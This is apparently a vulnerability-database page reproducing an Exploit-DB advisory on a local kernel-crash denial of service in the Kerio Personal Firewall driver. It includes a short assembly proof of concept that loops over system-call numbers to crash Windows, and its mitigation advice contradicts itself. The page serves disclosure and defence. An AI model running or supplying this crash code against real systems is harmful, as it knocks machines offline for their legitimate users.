header-logo
Suggest Exploit
vendor:
Kerio Personal Firewall
by:
7.5
CVSS
HIGH
Denial of Service
20
CWE
Product Name: Kerio Personal Firewall
Affected Version From:
Affected Version To:
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested: Windows

Kerio Personal Firewall Denial of Service Vulnerability

The Kerio Personal Firewall (KPF) driver does not properly sanitize API parameters, leading to a denial of service vulnerability. When certain parameter data is handled by the KPF API hook, it triggers an exception and causes a crash in the Windows kernel, resulting in a system-wide denial of service. An attacker can exploit this vulnerability to disrupt the services and deny access to legitimate users.

Mitigation:

The vendor has not provided a specific mitigation for this vulnerability. It is recommended to update to the latest version of Kerio Personal Firewall to address this issue.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/11859/info

It is reported that the Kerio Personal Firewall (KPF) driver does not sufficiently sanitize API parameters that are received from API's that are hooked by KPF. When the KPF API hook handles certain parameter data it will fail. Reports indicate that this exception is not expected and as a result, the Windows kernel crashes triggering a system wide denial of service.

A local attacker may exploit this vulnerability to deny service to legitimate users.

_asm{
  xor ebx,ebx
  start:
  mov     eax,ebx
  mov     edx,0x00010001 //writable mem area could be any value
  int     0x2e
  inc ebx
  jmp start
}

Navigation

Suggest Exploit

Services By CQR

cqrsecured